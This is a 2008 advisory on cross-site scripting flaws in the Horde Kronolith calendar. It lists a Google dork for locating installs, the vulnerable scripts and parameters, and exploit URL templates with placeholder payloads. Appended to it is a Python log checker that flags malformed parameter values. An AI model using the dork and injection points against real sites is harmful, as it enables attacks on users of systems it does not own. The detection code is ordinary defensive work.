The Horde and Kronolith Calendar applications suffer from multiple cross site scripting vulnerabilities.
+==========================================================================+
+ Horde & Kronolith Calendar Application & XSS Vulnerabilities +
+==========================================================================+
Author(s): Ivan Sanchez
Product: Kronolith Calendar Application
Web: http://www.horde.org/kronolith/
Versions: Kronolith: Copyright 2000-2003
Date: 23/05/2008
Kronolith is the Horde calendar application.
GOOGLE DORKS:
------------
intext:"Kronolith: Copyright 2000-2003"
Evil Functions:
---------------
week.php?
workweek.php?
day.php?
horde=
Internal Variables:
-------------------
timestamp=xss
horde=xss
Exploits:
----------
Insert evil code into these variables, then run the exploit !!!
http://site/horde2/kronolith/week.php?timestamp=< XSS EVIL REMOTE CODE >
http://site/horde2/kronolith/workweek.php?timestamp=< XSS EVIL REMOTE CODE >
http://site/horde/kronolith/day.php?timestamp=< XSS EVIL REMOTE CODE >
https://site/horde/kronolith/horde= < XSS EVIL REMOTE CODE >
Coming soon, more XSS !!!
NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!
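
Added example (not part of the original advisory or of Horde's code): a log check that flags requests to the scripts listed above whose timestamp or horde value does not look legitimate. The allowed value shapes, the log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Scripts that take the timestamp parameter, as named in the advisory.
SCRIPTS = ("week.php", "workweek.php", "day.php")
# Assumed legitimate shapes (not stated in the advisory): timestamp is a
# Unix time in digits, horde is an alphanumeric session-style token.
ALLOWED = {"timestamp": re.compile(r"\d{1,12}"),
           "horde": re.compile(r"[A-Za-z0-9]{1,64}")}
# Request line of a combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines, not taken from any real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [23/May/2008:10:00:00 +0000] '
    '"GET /horde/kronolith/day.php?timestamp=1211500800 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [23/May/2008:10:00:05 +0000] '
    '"GET /horde2/kronolith/week.php?timestamp=%3Cb%3Eprobe%3C%2Fb%3E HTTP/1.1" 200 5240',
    '192.0.2.44 - - [23/May/2008:10:00:09 +0000] '
    '"GET /horde/kronolith/?horde=%3Ci%3Eprobe HTTP/1.1" 200 4100',
]


def suspicious_params(log_line):
    """Return [(param, decoded_value)] for values that break the allowlist."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if "/kronolith/" not in url.path:
        return []
    hits = []
    # parse_qsl percent-decodes, so encoded markup is checked in decoded form.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        rule = ALLOWED.get(name)
        if rule is None:
            continue
        if name == "timestamp" and not url.path.endswith(SCRIPTS):
            continue
        if not rule.fullmatch(value):
            hits.append((name, value))
    return hits


def scan(lines):
    """Return [(line_number, hits)] for every line with at least one hit."""
    found = [(n, suspicious_params(line)) for n, line in enumerate(lines, 1)]
    return [(n, hits) for n, hits in found if hits]
```

The same allowlist, applied server-side before the value is written into the page, is the corresponding input check; output encoding is still needed wherever the value is echoed.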